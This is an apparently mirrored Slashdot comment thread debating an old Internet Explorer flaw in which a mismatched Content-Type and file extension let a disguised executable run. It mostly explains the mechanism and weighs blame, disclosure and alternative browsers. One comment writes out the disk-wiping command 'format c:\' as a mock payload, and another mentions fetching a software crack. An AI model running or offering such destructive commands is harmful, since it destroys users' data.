Slashdot Mirror
Another Gaping Microsoft Security Hole Goes Unpatched
For readers who care, this vulnerability results from Microsoft's integration of IE and the operating system. Files received via HTTP are supposed to be handled by examining the Content-Type header sent by the webserver - for instance, the Content-Type sent with this webpage is "text/html", identifying it as a text (non-binary) document which is marked up with HTML.
Netscape and most other browsers have no problem with this.
You will notice, however, that this method is rather different than how a Microsoft operating system determines how to handle a local file - by its three-letter extension. A file named "foo.txt" is handled as a text file, even if it is a binary image file that has been renamed for some reason.
Now, what happens when you integrate your web browser and your local browsing, say to render moot an anti-trust suit filed against your company? Will local files get a Content-Type? Will remote files be handled by examining their file extension?
IE handles files in an odd mish-mash of looking at the Content-Type sometimes for some purposes, looking at file extension sometimes for some purposes. It's hardly surprising that the bug-hunter in the above story has found a way to feed it a Content-Type at odds with the file extension - the Content-Type may be innocuous, but the extension says "execute me", so when the "integrated" IE engine gets ahold of it, the malicious content is automatically executed.
Now Microsoft has a problem. Because they chose to ignore the standard for handling downloaded files, Microsoft has painted themselves into a corner. If Microsoft suddenly changes how their browser handles downloaded files, tens of thousands (perhaps hundreds of thousands? any webpage which downloads files) of webpages "designed for IE" will have to be rewritten. No doubt this is the issue their programmers are wrestling with right now. It's a fundamental design issue - Microsoft designed their web browser with the goal of doing what was best for Microsoft (evading anti-trust charges) rather than doing what was best for their users. In fact a proper "fix" of this hole probably involves de-integrating their browser and local file handling to some extent.
If you routinely browse with Internet Explorer or read mail with Outlook, keep in mind that any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything. This has been true for at least two and half years. And keep in mind that you can't fix the problem, you must rely on Microsoft to do it, if they so choose. And keep in mind that Microsoft is in no hurry to do anything about it, because it doesn't even consider it a vulnerability. Happy browsing!
I know this sounds like a stupid average comment but...who's using IE anyway? After I found Opera for Windows, I have no desire for another browser at all. Opera has some very useful UI details that make IE look as comfortable as reading web pages with wget | more.
You either get a warning that something is about to execute on your machine or you are prompted to download the file you just clicked on.
Sounds like a gaping hole to me.
Jeez, how about some perspective here?
I find it disturbing that the ones who made the exploit public are only revealing the details under NDA. It's not like this is a secret to those who would use it for malicious purposes. Sigh...
this seems to be a recurring theme... microsoft releases software, it has holes. maybe the problem isn't with the software, it's with the script kiddies wreaking havoc by exploiting them.
We'll see plenty of coverage within the next 48 hours, Microsoft statements by the end of tomorrow, and a bugfix by month's end. The big question is going to be, how will people cope in the midst of it all? Will this kind of lagtime offer virus creators to do a whole world of damage? Considering how things have spread recently, I wouldn't be surprised at all if they did. Might be time to start browsing with my iBook more often.
What kind of steps can people use to protect themselves now, is there any kind of toggle or security setting that can be turned on in IExploiter 5.0(tm) to keep us a little bit safer?
My own pointless vanity vintage computing page
I have a very basic understanding of the law, and I am wondering if MS could be sued for negligence.
-- "I'm open to falling from grace"
Hmmm. Wonder where Bill's .plan file is?
lets not get carried away here.
If I disable downloads, how do I download the patch?
Oh yeah, install linux!
mk
"Memes do not exist! Tell everyone you know."
Considering that a lot of users never update their browser at all (I have seen quite some people using the IE 4.0 that came with Win98), even an immediate release of a bugfix will still not undo the danger of having that security hole in first place.
If this bug in IE has really been around for two and a half years, how is it that no one has stumbled on to it until now? Could it be that (GASP!) security through obscurity actually worked in this case?
But I have been using a Win2k box at work, with IE 6.0 on it, for several hours a day now. In fact, we needed to temporarily install 3D Studio for one of my co-workers, so I visited astalavista and many "related sites" on that box - once for the software, twice for the dongle crack. And I can say for certain that my box hasn't been cracked.
So, as much as we want to believe that security through obscurity doesn't work, the vast majority of users have been safer because this sploit didn't show up on BUGTRAQ. Sure, Microsoft should have gotten off their collective tush and done something about it, and they should be held responsible now. But the mere notion that we are all in danger just because these bugs are kept secret is patently ridiculous.
~wally
Does anyone else notice that this story has been posted before, many times, with only slight variations each time?
What's in a Sig?
What kind of steps can people use to protect themselves now?
If you really want to toggle IE into secure mode you just need to click the little "X" in the top right corner of the window.
Slashdot? Oh, I just read it for the articles.
But entirely true and well deserved. I think they will be forced to patch this real soon now though, since now that the word is out many user's webmail will start filling up with all sorts of wonderful attachments to exploit this.
format c:\
someone decides to put up a website to demonstrate this vulnerability. the site deletes everything on your harddrive. someone else decides to embed this into an HTML email. this email is sent to lots of people and deletes their harddrives.
will MS be held responsible? will the person who put up a website as a 'proof-of-concept' be held responsible? what about the guy who sends around the email?
ultimately folks, I think the end user is going to be held responsible. i don't know about the rest of you, but the company I work for will hold me responsible if our systems fail. and blaming MS isn't going to help me one bit.
now that this cat is out of the bag...what can we do to protect ourselves if we can't switch from Windows b/c our jobs won't let us?
I prefer to call it security through unavailability. The unavailability of IE that is.
Go Galeon!
Security and a fast browser: Great stuff
Built on top of a free OS: Priceless.
No, really it is priceless...
From the slashdot article it doesn't seem like it would affect IE on other platforms (such as Mac OS). Although that probably affects only 4% of web traffic, it's important to note.
If you routinely browse with Internet Explorer or read mail with Outlook, keep in mind that any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything.
This is just not true. You specifically have to download things before they can do anything using IE and if you are dumb enough to use outlook and let it have the ability to execute file attachments automatically, you deserve what you get.
Michael says : "completely open any time you browse the web with IE. "
Story says "who view a specially constructed Web page"
Okay, the hole isn't good - and MS must fix it - but the article as posted by
Your computer is open if you stumble across a specially constructed site. If you browse
Mmmmmmm
"The patch for Internet Explorer (IE) is currently in testing and could be released soon"
Second damned sentence. No wonder I don't come here anymore.
Another security hole in IE? I'm all patched out.. :(
Content-type is an HTTP header. To recieve this info must be transmitted via HTTP. You may have noticed that Netscape (and even Lynx, and yes even on Linux) have no problem displaying local html/ pdf/ whatever files without recieving an HTTP transmission, and thus no Content-type header.
Yep, they do the same thing and look at the file extention to determine how to render files.
I'm not saying there's not a bug, or it's not severe, but examining the file extention to determine type is hardly an IE-only thing.
Trolls throughout history:
Jonathan Swift
This is why I started using Mozilla.
Microsoft can't be to blame for this... Would you blame Linus for someone running a Kernel from 4 years ago, that might have a security hole in it?
And time exactly how long it takes for someone to make a virus out of this li'l puppy.
The best(?) part being that, after years of telling users that to get a virus via Outlook they had to click the attachment, it seems to be possible to write an executable-disguised-as-HTML message that will automatically execute, since there's no option to turn off HTML viewing in Outlook.
You ask if there is any toggle in IE? Did you read the article because it explained in there that there is indeed a toggle you can flip. Basically you have to turn off file downloads to protect yourself.
Most end up knowing that they will clean up the mess, because "The top guys like Microsoft so much - it has so many features." Nobody is willing to do an honest cost accounting for the top guys.
Until the collective IT folk give an honest accounting of how much MS is really costing them, there will not be a switch away from MS. The moment they do - stampede!
telnet server.foo.com 80
/GET file-to-have-your-advice.
Connected to server.foo.com.
Escape character is '^]'.
/HTTP
For example, there are seven or eight differnt start-up objects in Windows 9x:
- msdos.sys [hidden file]
- config.sys
- autoexec.bat
- registry [many different keys]
- system.ini
- %windir%\system\vmm\*.* [just sucked up whole]
- startup folders [yes, you can have startup folders nested.
What a program is to do with a file is done in three different ways as well.It's little wonder that the thing is open to attack. You can't hunt it down unless you pretty much hack it, and follow their goofy retro thing with the 64-bit sequence: {01.22.23....}
Lack of forethought, I imagine.
OS/2 - because choice is a terrible thing to waste.
Well, you can just do what I do: Browse with Mozilla.
if you try and open an .exe that is named as a text file, the file associations within windows will launch notepad (or associated program) and NOT fire off the renamed application, ditto with .html and .wav files (or any other associated file), are they sure they arent talking about a file named something.txt.exe?
Thanks to file sharing, I purchase more CDs
Thanks to the RIAA, I buy them used...
I watched a good bit of this thread on bugtraq (check the archives). Several people on the list attempted to reproduce the exloit as detailed by the original poster and failed. Whether that was their mistake or not is anyone's guess. I didn't try it myself. It only seamed to affect certain builds. I'm certainly not saying IE users aren't vulnerable, I'm just saying get details before making too much noise. MS won't release a fix until they're good and ready, so let's just sit on the flames a bit and try to find out what is going on in reality.
It really isn't that hard to fix...
Honestly. No one here can really say anything new or relavant at this point. This story has been published hundreds of times, just with a different headline.
Now, what should really happen, is DoJ and BBB attack MS for malpractice. Purposefully creating vulnerable systems and products which thereby require updrades and costly procedures.
These people creating all these hacks and such for IE is a good thing because it makes IE better (hey, look how many people use that browser), but what really needs to happen is create a working browser with real software issues...not stupid security holes that can be easily avoided (and should have been).
They should be creating something that Joe Shmoe can easily program for in XML to change the way it looks. They should be creating something where I can go to a web-site without having to worry about catching a random virus. Perhaps this will add actual value to their product...rather than the forced value (since it HAS to be installed on all Windows machines).
"Time is long and life is short, so begin to live while you still can." -EV
This sounds to me just like the GM/Ford cases at the 60's about negleting consumers. Isn't time to DOJ put a period on all these things?
First that stupidity of Nimda IIS bug, that can't be fixed until next IIS release. And now this Security through obscurity crap?
Now I want to ask. "Where will M$ take us". I know where I want to go, but what about them?
-=-=-=-=
I know life isn't fair, but why can't it ever be un-fair in MY favor!?
Microsoft does it's best (or worst) to provide something. But, heck, it's FREE. IE costs us nothing.
What I DO pay for is my virus scan. I'd like to know that if something gets through and hurts my security, the virus scanning software would catch it.
I wish people would stop getting mad at people for providing otherwise OK software with bugs in it, when those programs are FREE, and wish people would start getting mad at the virus scan companies (who my company pays lots of money to) for not catching threats.
The Internet is generally stupid
There use to be no such thing as an e-mail virus either until Microsoft came along and decided to give us one.
Let's all put our hands together and thank Microsoft.
1) Go to www.mandrake.com 2)download the Mandrake 8.1 ISOs. 3) Burn them to a CD 4) Insert CD #1 5) Reboot 6) Follow on-screen instructions Voila!! No more security problems with IE. And I almost forgot...no more BSOD!!!
seems like microsoft engineers like to point out in several dlls that netscape engineers are weenis, as was just reported yet again on bugtraq. i guess the question is simple... what is worse: being a weenie or a loser who does not know how to code securely/properly...
According to the article, the issue only comes up if you are prompted to save/download a file, and choose to open it from it's current location. The file may appear to be a .txt or whatever, but if you open it from its current location you can't know for sure whether it's an executable.
The suggested solution is to never open from the current location. Choose save instead, which will reveal the real file type.
Damn right I would, if he didn't tell anyone about it, didn't release the code for public review, and didn't update the kernel so people could download new versions with a relatively simple installation process.
But, gee, since it's Linux, I don't think those things are real concerns, do you?
Hope to shed a little light down under your bridge.
My own pointless vanity vintage computing page
This is a terrible vulnerability and I've seen it in action.
.exe WITHOUT warning and WITHOUT asking.
In IE, some audio formats are set to execute automatically.. so if you send a Content-Type of, say, audio/wav (which is executed automatically).. but the filename is myvirus.exe, windows will rely on associations based on file extensions in the registry to execute the file, as opposed to, say, trying to feed the file through a player.
So it will automatically launch the
This is how some recent worms were spread around.
Boy am I glad I use mozilla for web and email.
The article was talking about current/recent versions of IE.
I heard a stable release version of LINUX deleted your hard drives.
I've evaluated software packages for my company for 7 years, and I have found absolutely nothing distatefull/upsetting about anything that has come through our pipe through IE. Sure you have a few porn URL's finding their way into the logs once in awhile (usually the newer employees testing the limits of our IT usage policy) but nothing that can be considered malicious.
We take the usual precautions with our servers (standard antivirus, NT service packs) and as far as I'm concerned, that should be enough for anybody. I for one am tired of worried employees clogging up my (Outlook) in-box asking me if their work is at risk because of these "security holes". I try not to be smug when I reply that most of these claims are fraudulent and only meant to discredit a legitimate company with scare-tactics, flowery (and overcomplicated) techie-garble and lies.
Please, for the sake of making my job easier, stop posting imaginary stories about imaginary Microsoft security holes.
That's funny, my copy was $100, and that was with the upgrade discount.
Well, if you use Outlook, and you're dumb enough to run with preview pane on, you deserve what you get. Simply run without the preview pane on, and delete messages from unknown people before reading them. Very simple.
There is a distinct difference here. If you only count "running" IE, then that would mean whenever your Windows machine is up and running with how M$ has integrated IE into the kernel.
However, if it only matters when IE is surfing the web, then we have a little bit of security by ignoring IE.. Just wondering about this point of clarity...
[move
I'm not terribly shocked--using a 3-letter extension to store that much metadata is absurd.
Luckily, the MacOS doesn't do tha.... oh, wait.... they do now...
Potato chips are a by-yourself food.
That'll definitely work, but the problem is going to be users at large networked sites. For example, the school I work at part-time as a tech. I -wish- the option were there to kill Windows in the labs, toss in some Apple hardware or Linux boxes. But for about a billion reasons, that's just not going to happen in my lifetime. Considering that we can't even afford to drop in a $700 build-it-yourself PC in some of the faculty offices while they're using '486-66's and P100's...
Ohyeah, and some are so damn dense they keep putting A4 paper in the printers. Support these people under Linux? No friggin' way.
My own pointless vanity vintage computing page
Bad analogy dude. The problem is *current* browsers have the problem as well. You perhaps *could* blame linus for the current one having a hole.... or RATHER you could if he knew about it and didn't do anything, as in this case Microsoft is. Boys and girls, if anything goes wrong it's lawsuit world here, because as far as I can see , keeping it a secret someone is about to get his shit fucked up is being NEGLIGENT.
Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
Microsoft is to blame because they made it "easy" to use Windows!
Computers are complicated machines and should be treated as such.
Opera 6.0 is now available for download. If you tried an older version of this browser and thought it sucked, try it again. It's light, fast, more standards compliant, and its rendering engine is very compatible with the way I.E. and netscape work so it works practically everywhere. You can browse MDI-style, which means you can have all of your browser windows as sub-windows of the main one, OR you can go NS/IE style and have a separate window for everything. Its skinnable (but you don't have to use a skin), it has more privacy and security features than I can count. You can turn off javascript pop-ups (or merely relegate them to popping up in the background). You can spoof the broswer string as being I.E. or netscape for those sites that are browser bigots. I cannot say enough good things about this software. And its available for BeOS, Linux, Solaris, Mac, OS/2, QNX, Symbian OS and of course Windows. Get it here.
Error: PANTS NOT FOUND. Press <F1> to continue.
Could be that the ones that DID know about it didn't say anything. How would you have known? Security through obscurity may "work" but there's no audit checks to determine if it does or not unless someone aggressively uses a security flaw.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
A victim is defined in Websters as someone subjected to circumstances beyond their control.
MS must believe this is a victimless crime, since everyone using IE has the choice to not use it, right? And since usage gives tacit approval of rights as defined by MS, any user subjected to a break in of their system is on their own.
MS has made a mockery of responsibilty, by leaving it up to consumers to take action or fall prey. I can only imagine the corner reserved in hell for a large part of the Redmund populace.
Let's not get into the definition of gaping hole, I'm sure some juvenile is prepping an ASCII rendition as we speak.
Imagine a backyard fence and the neighbors ill-tempered dog:
a.) built with a large hole so the dog can come thru uninvited
b.) built and later damaged by your neighbor...dog comes thru
c.) built and damaged by you, so the dog can come thru (again, uninvited)
Under scenario a, the assumption is you contracted for a fence sans holes, and this was a builder mistake...seems the builder is responsible for closing the hole and paying for shots needed when you get bitten by the dog.
Scenario b...go after the neighbor...simple.
Scenario c...SOL.
MS is responsible under scenario 'a', but points to scenario 'b' as a main issue, and figures consumers are stupid enough to accept scenario 'c', if b doesn't fly. They avoid scenario 'a' all together.
Why they get away with this type of subject-switching (look, over there! Thats the problem!!!) prehensile logic is clear...consumers are stupid.
Wake up, folks! As long as you continue to buy MS products in the head down position, MS will continue to shirk responsibility for shoddy goods.
You base all of the internet traffic on the web on 9688 hosts (not accesses or people) accessing one WWW server at a university? Geez, go take a statistics class.
-Shmibbon
Now I know Slashdot is getting ready for its annual MS beatdown stick, but read the article. It says MSFT is testing and ready to release a fix to the problem.
The bug hasn't been exploited. It hasnt caused huge problems. MSFT is coming out with a fix BEFORE hackers could find a way to exploit it. THEY took care of the problem fast enough to stop it from being a problem.
the byproduct of years of oppression by the white man
No, I didn't. But at least I'll admit that. :) However, I did assume that the obvious response would be something along those lines, which just doesn't work in the environment I need to have a fix for someday, which is a large number of client workstations. If we turned off downloading of files, I think we'd get lynched by the faculty. :)
My own pointless vanity vintage computing page
Second, don't just bitch about IE. If you haven't already, check out the alternatives:
-
Mozilla, now in Version 0.9.6, is very feature-rich and fast and the most standard-compliant browser in existence, but not for computers with less than 128 MB of memory.
- kmeleon (Windows) and galeon (Linux) are Mozilla derivatives with smaller footprint.
- Opera, which is closed source adware and requires registration, is a very fast browser that is especially recommended for "information surfers" because of its excellent navigation and caching.
- Konqueror is KDE's built-in browser. Thanks to Qt/Embedded and/or KDE-Cygwin, it might be ported to Windows as well.
- Lynx and W3M are up-to-date text mode browsers capable of displaying most pages which do not depend on images or animations.
There is a choice, you just have to make it. And no, I didn't copy&paste this from elsewhere and I actually tested all of these, so you may mod me up without guilt. My personal recommendation: Opera (and Mozilla once I've upgraded to 512 megs and V1.0 is out)."Microsoft will patch a flaw in its Web browser that could allow an attacker to silently download and execute malicious programs on the computers of users who view a specially constructed Web page or e-mail message." (emphasis added)
From the article's intro:
"Microsoft has known about it since November 19; they refuse to provide any information about when a patch might be made available, if ever."
Also: "And keep in mind that Microsoft is in no hurry to do anything about it . . ."
Full marks for a more thorough description of the exploit and how it came about -- but did the poster actually read the article before posting? Looks to me like he hit the original report but not the article, which says that MS did initially plan to let it go, but did an about-face after a while.
Nasty flaw nonetheless -- glad I switched to Mozilla.
The problem here is that some journalist got wind of a patch to soon and decided to write a story about it. I think that the media needs to think about what they write in terms of software security.
I mean even since Sept. 11 all media outlets are rethinking what is and what isn't safe to release to the public in the name of national security.
What they are overlooking is that security holes in software is also a breach in national security and they need to step back and decide if what they are releasing is appropiate. The argument could be made for this particular article either way.
You might want to check Post Anonymously next time. You do realize Autodesk is one of the most rabidly anti-piracy companies on the planet?
The upstream comment is 100% pure bullshit.
When you're using Netscape or Lynx and the URL starts with "http:", it's speaking HTTP. It can use that protocol to send whatever type of data the server wants to send - text/html, application/x-pdf, whatever. You seem to be confusing HTTP and HTML - the communications protocol and what's being communicated.
Meanwhile, the canonical way to identify the type of a file on a Unix system is to look at for "magic numbers," and then hopefully verify them by parsing what you think is the header and making sure checksums are valid, values are sane, etc. Any Unix application developer that looks at the extension *alone* should usually be fired on the spot. (The sole exception is completely unstructured text where you have to use it as a hint, e.g., ".c" means C, ".cc" means C++.)
This isn't just a bad attitude, it reflects the fact that Unix tools have to deal with pipes and often don't have any filename (much less extension) associated with the data stream. If you require a file extension to understand what you have, you've crippled your application.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
That reminds me of my warez days on irc. When people used to offer up site lists via dcc bots, other people would merely have to type a certain command to begin a dcc send from the bot to them (something like: !list). One day, one of the OPs set his away message to: "0-day, 2000 site ftp list. All verified and working! Hit Alt+F4 to recieve the list!" Next thing you know, the channel of about 120 people turned into about 70 people. We almost got flooded off from the server messages 'NickX has quit' 'NickY has quit' 'Nickxxx has quit' et al. It was great.
You're talking local versus server context. In the case of a local file, MS and Windows "KNOW" that it's not an executable because of extention. However, if the server tells the browser it's something completely different, it'll do it's level best to try to carry out the cuing from the server- i.e. if it swears it's an aplication of the type MS understands, it'll try to run it, even if the extention is ".txt". At least that is my understanding of the flaw in the browser.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
The concern, from what I understand, is that a user might be lead to believe that "readme.txt" will be opened and viewed as a text file by IE. This, when in fact the website has placed executable binary/script data in the file and changed the appropriate response headers so that IE is fooled in to executing it as a program if it is 'opened'.
All the user sees as a prompt is "Open" or "Save Target As" using the menu options OR again "Open, Save, Cancel" by clicking on the link.
For an inexperienced user, the appropriate option will probably not be obvious. This is because many users have a lot of trouble navigating the file system to find files that have been saved by applications and enjoy the shortcut of having the windows decide how the file should be 'opened'.
I agree that an experienced user would never choose open because they know this is very risky. But, in my mother's case, she has trouble deciding when to click and doubleclick.
In Microsoft's defence, however, the "Open" option is never the default. Thus, it's probably safe to say that an ignorant user will almost always be safe from this attack as they will be picking the default and saving the file to the disk. At that point, "readme.txt" will cannot be executed and only openable from a text editor.
Anyways.. no matter how you look at it, this is a problem that fundamentally involves the act of downloading a file. Something even my mother knows not do by herself. This is not a security issue in the same magnitude as the worm viruses that plagued IIS.
Do not spread "09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0" over the internet, thank you.
Thanks, Timothy, for your unwarranted alarmism. Saying that "any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything," with the implication there's nothing you can do about it is ridiculous.
An accurate summary of the article:
Any web page you visit or any email you open can cause a dialog box to pop up, prompting you to save or open a file. The filename may be wrong on this dialog. If you choose open, you recieve no farther warnings before potentially malicious code is run. If you choose save, it prompts you where to save it, and saves it there. (At that point it's relatively safe - if the filetype is still wrong, you can't execute it, if it's not wrong, you can see it's an exe).
A patch wouldn't help much - the people who are up on things enough to install it are the same people who will know to take the SIMPLE PRECAUTION of not opening unknown files directly off the web.
It is a shame that due to a bug in their browser MSIE doesn't run sirens and blinking lights and threaten the possible destruction of your computer every time you try to run any code that you didn't write yourself, but it doesn't exactly open your box up to the world or anything.
In conclusion, let me say screw you and your shitty biased reporting, slashdot.
Trees can't go dancing
So do them a big favor
Pretend dancing stinks!
Read what Micheal is saying again.
- Copy your current explorer.exe, shell32.dll, comdlg32.dll, notepad.exe and wordpad.exe to a backup location in case things go haywire. (I've done this before on Windows 98 and ME boxes without problems, but it's always good to be safe).
- Insert the Windows 95 CD, and start a dos prompt.
- From the prompt, enter:
- You should have the files listed above appear on your desktop. Now shut down into DOS mode, and copy the new shell32.dll and comdlg32.dll into your Windows SYSTEM directory, and copy explorer.exe, notepad.exe and wordpad.exe into your WINDOWS directory, and reboot Windows. (If you're using ME, you can go into c:\windows\system.ini and change your shell to taskman.exe in order to be able to replace explorer and the other system files)
Your system should come up with the old Windows 95 shell, which doesn't have any of the IE integration bullshit. IE will still launch as a separate application (with an Office-style splash screen, even!) and since the IE dll's aren't stuck in your memory all the time, your system should be a bit faster too.d: (or whatever your CD drive is) /a /l c:\your\windows\desktop win95_02.cab comdlg32.dll explorer.exe shell32.dll notepad.exe wordpad.exe
cd win95
extract
Of course, after doing this, the next step is to replace your browser, but that goes without saying. :-)
Loneliness is a power that we possess to give or take away forever
I notice many people complain about MS using the web browser and file browser as the same thing. But it seems everyone else is doing that too. KDE's Konqueror is a combined web/file browser. Nautilus also does this. If this is such a bad idea why is everyone doing this. The only desktop that I know of that doesn't try to do this is the Mac OS.
Sure, MS can be sued for negligence, just like they can be sued for antitrust violations. You may even win, if you can prove that you suffered actual harm from this. And then the judge will ask Microsoft what they think they should have to do to compensate you, and Microsoft will say that they should give you a sticker that you can stick on your monitor that says "Don't open files from their current location. Always save to disk!". So in the end, Microsoft will stick it to you.
The details were revealed by StatiC on bugtraq. He seemed to discover a way to do it a few months ago, but didn't "put 2 and 2 together" about using a .exe extension until the generic advisory without details was published about 2 weeks on bugtraq.
Details and exploit:
http://www.securityfocus.com/archive/1/243017
I didn't say it was a great solution I just said it was a solution.
An even better solution is to use paper and pencil.
Nautilus on my Debian GNU/Linux system depends on magic to determine file type and it is very reliable.
IE does however depend on the file extension to determine whether the file is executable or not. Anyone can send you a file with a .exe .com or .bat extension and it automatically becomes executable when you save it. On Linux an other UNIX systems, a file is executable when that permission is given, executability is not determined by its extension. So you would have to do a chmod +x file after downloading a file to be able to run it.
ayottesoftware.com
This is a shameless pandering to the preconceptions of the Slashdot crowd. The statement that "Nobody is willing to do an honest cost accounting for the top guys" is simply not true, and it's an unfair dismissal of IE's very real successes in that space.
IT guys can and do choose other browsers. Last I heard, Navigator still had over 1/3 of the corporate browser market. Suggesting that IT folk would be cowed by the "top guys" flies in the face of every experience I've had with them: that they're pragmatic, honest, and outspoken.
How many fucking years have they had to do this? How many fucking years longer are we going to rely on GIF (fucking cringe) for transparency because 85% of web browsers are using IE?
How many other browsers have implemented alpha transparency in PNG's in absolutely no time at all? Mozilla, Konqueror, Opera... are there any more? Why the FUCK can't IE, which is supposedly the best browser there is, handle it?
Pardon my absolutely mindless lunatic ranting... just really pissed that PNG's still aren't an option... thanks to IE.
Sticking feathers up your butt does not make you a chicken - Tyler Durden
There must have been a huge party at FBI headquarters on Nov 19 (when this was reported to MSFT) since they finally had a viable delivery system for Magic Lantern.
Microsoft designed their web browser with the goal of doing what was best for Microsoft (evading anti-trust charges) rather than doing what was best for their users. In fact a proper "fix" of this hole probably involves de-integrating their browser and local file handling to some extent.
Hey Malda and VA Software executives, or whoever is in charge of keeping a minimal amount of decency on this site: why do you keep letting crap like this make the front page? This is not informative, insightful, or in any way useful. This is just a rant by a pissed-off bigot, pure and simple.
The vulnerability is real, but it is presented in such a hate-filled manner that it's unbearable to read. Michael has done nothing but spew venom in this posting. He's doing the right thing by bringing this to the attention of millions, but he does so with only malicious subtext to his main point.
This reads like a stream-of-conciousness scream from a 13-year-old who's just had his Nintendo taken away from him. This isn't journalism, it isn't even information, it's just garbage.
Please, do us all a favor: if Michael can't clean up his act and give us his material in at least a somewhat-presentable manner, fire him. You're losing respect for your site with postings like this. And no, this is not a troll, I'm serious.
With all of the email viruses, internet borne viruses, worms, holes, DDOS attacks, it surprises me that anyone even uses the internet or related technologies at all. It will be a sad day when the whole idea of the internet is just "dumped" because of hackers (the bad kind), holes and bandwidth abuse. It seems like daily that I read through the articles on slashdot and find a new hole, exploit or virus that is being used or abused. Take for instance the recent decision to shut down the first IRC server, because of repeated DDOS attacks, that is truly a shame. As I have said often before, abuse it and lose it...
Nathaniel P. Wilkerson
www.haidacarver.com
My god, that entire post was one big MS bash fest.
They make ZERO mention of the fact that dialog boxes DO still appear.
From reading that article one is lead to believe that the file is just "silently" downloaded without any noticeable signs....
I'm getting a little sick of the way certain "journalists" will downplay anything decent MS does, and blow the bad things WAY out of proportion.
It's ludicrous!
From this particular crowd I expected a LOT more than sensationalist garbage! If I wanted that I would bookmark CNN!
Sounds like this patch (assuming they actually fix it) that will be forced by the PR gods will fix an issue that I've struggled with. IE just ignores the blody HTTP header when it comes to mime type.
As a work-a-round, I've been adding a &whatever=foo.extention to trick IE 5+ into using the extention I need it to use. (Ugly if you need to return a PDF document from a JSP (or god help you) ASP page. I have a pretty good guess how this could be used by the forces of darkness.... never thought about "real" binarys before....
+++ UGUCAUCGUAUUUCU
Then you've probably clicked on some links that took you to sites that are very little known and that could contain rogue code that exploit this IE security hole.
I guess IE users will just have to stop using search engines then. I guess that will only affect about 80% of the Net users, so you're right, this isn't a big deal.
ayottesoftware.com
"Oh shit." -- William H. Gates, III
My friend will all be really excited about this now because he bought his copies from a guy on a street corner in Hong Kong for the equivalent of three dollars!
With both IE and Konqueror, you have a good web browser (excluding problems already mentioned with regards to IE...), and that web browser also acts as the file manager, except all that each is doing is mimicking what their predecessors did without providing any extra functionality that is inherent in a web browser.
Sure, IE has some neato wiz-bang "features", but it's ridiculous to claim that it adds anything to local file browsing that wasn't already provided by the previous program. Same goes for Konqueror.
Granted... they are both better file browsers than their predecessors, but that functionality is completely separate from web browsing and could be removed and used to create a totally separate file browser. There is absolutely nothing gained by integrating the two.
Sticking feathers up your butt does not make you a chicken - Tyler Durden
You can do it manually like that if you like, or you can just get 98lite and have it do the grunt work for you. Best $15 you'll ever spend if you're forced to use Windows on a semi-regular basis (for gaming, Office, etc.)
ya except rpm based distros suck ass. long live debian! (and os x)
I'm not one generally to defend Microsoft but I distinctly remember this being an issue several months ago that we patched.
l t. asp?url=/TechNet/security/bulletin/ms00-082.asp
Would the following patch not also fix the issue described here?
http://www.microsoft.com/technet/treeview/defau
The technet article describes HTML emails but I wonder if the same patch wouldn't fix the general problem?
-Tseuq
My friend, there is not free lunch, everything costs something.
The price of IE is reflected in the price of Windows and all other Microsoft software.
Sticking feathers up your butt does not make you a chicken - Tyler Durden
This is mostly true, however gcc does require certain file extensions (check 'man gcc'), and I would say that gcc is a major UNIX/Linux tool.
Personally, I don't think that Linus would have allowed something like this to get through in the first place.
But that's just me.
I like you, Stuart. You're not like everyone else, here, at Slashdot.
Comment removed based on user account deletion
using this.
a wedge of fine aged Swiss or Internet Explorer? Or was Internet Explorer modeled after Swiss cheese in the first place?
Now, what happens when you integrate your web browser and your local browsing, say to render moot an anti-trust suit filed against your company?
How is this any different from Konqueror? I may just not be understanding Konqueror, but from my limited experience it seems like the same thing. That's all I want to know,
11 was a racehorse
12 was 12
1111 Race
12112
I've had serious problems with Opera crashing the operating system when there are too many windows. I've reported this bug several times. No answer.
Bush's education improvements were
Appendix A: MIME Type Detection in Internet Explorer
Now, here's how I came across this little gem of stupidity:
I have designed a few cgi-enabled websites (for myself) that have a rather odd feature- compiled VB cgi. This seems very strange, I'm sure, but VB is actually fairly nice for very simple programs that handle databases.
Unfortunately, I started running into trouble when I assumed that IE played by the rules with the Content-Type headers. I naively assumed that I could generate images as well as html on the fly, and IE would display it the way it was intended, since this would be very good for displaying images that were stored in the blob field of a database.
Wrong! It turns out, certain Content-Types are considered "ambiguous", meaning that IE assumes you don't know what you're talking about and it needs to check to see if the content actually is what you say it is. If it fails the test, then IE overrides the Content-Type and simply displays the page as what it thinks it is.
Ok, that doesn't sound too bad, does it? Well, what if you have a file that you list as Content-Type: text/plain (which is one of the ambiguous types), but the actually data is executable! IE tests the data and decides that the Content-Type is wrong, decides to treat it as executable, and pops you a dialogue box, asking if you want to download this or open it.
Mind you, all this time, the URL sitting in your address bar probably ends in ".html". So you say "yeah, lets open the file.
Now, I haven't tested this scenario, since I don't have malicious intent. The real bug is probably not quite as straight-forward as this (but then again, maybe it is). However, I can't help but be disgusted at the fact that this is not an accidental oversight, but rather an unintended consequence of a boneheaded feature.
I have received a number of emails recently attempting something like this, but I'm not using Windows so I can't say whether or not they would have been harmful.
Sticking feathers up your butt does not make you a chicken - Tyler Durden
It is delivered with the same media but you are not offered the option of opening any files it just happens without your knowledge. Thus making it the vulerability worse if it were released to the world as a virus.
Until one of my users got an email with an attachment that would just execute itself from the preview pane, no matter what the security settings were.
I sat there and toyed with it (yanked the LAN cable first) and absolutely could not get it to *NOT* run automatically.
(Her Outlook Express probably had been upgraded a month before, I think, but downloading the latest version *did* take care of the problem.
The real question is, why does Outlook support *any* of these behaviors? Sure, occasionally it's nice to HTML-ify an email and stick in a picture, but do I really need DHTML, scripting, cookies and all of that other crap?
When was the last time somebody had a legitimate reason for sending an embedded script in an email?
Oh, sure, let me have my personal emails set a cookie when they get read. Sure, I'm really going to do that.
Why not just have a really scaled-back HTML renderer that ignores tags that you choose to ignore?
Cheers,
Jim in Tokyo
-- My Weblog.
Those of you who read the articles will consider this redundant, but I've seen so many different interpretations of how the exploit works (and many wrong ones modded up), so I thought I'd clear it up:
